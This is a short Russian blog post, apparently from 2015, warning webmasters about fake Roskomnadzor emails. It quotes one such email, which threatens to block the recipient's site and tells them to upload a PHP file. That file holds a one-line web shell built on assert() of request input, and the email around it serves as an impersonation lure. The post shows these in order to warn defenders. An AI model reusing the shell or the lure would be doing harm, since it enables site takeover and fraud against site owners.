Давно уже думаю — почему еще ни разу не видел фальшивых требований от мошенников под видом роскомнадзора. Вот сегодня наконец-то дождался.

Клиентам стали приходить письма якобы от роскомнадзора с требованием залить бэкдор к себе на сайт:
текст письма
Здравствуйте.
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени XXX в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2¬1618/2015, Ваш сайт XXX был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».
Для идентификации Вас, как администратора доменного имени XXX, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-YYY.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени XXX*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: XXX/reestr/reestr-YYY.php
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени gamerone.ru, следую инструкции указанной выше, то Ваш сайт gamerone.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
— С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.


Веб-мастерам, хостерам и т.п. — вероятно клиенты скоро массово начнут обращаться с вопросами по поводу того как такую инструкцию выполнить — будьте внимательны и проверьте что именно хочет сделать ваш клиент.

Настоящие сообщения от роскомнадзора всегда подписаны цифровой подписью и никогда не содержат требований что-то разместить у себя на сайте.

Комментарии (1)


  1. DanXai
    27.08.2015 08:58

    А в чем смысл пробела? В смысле, зачем давать пользователю лишний повод подумать, что он делает?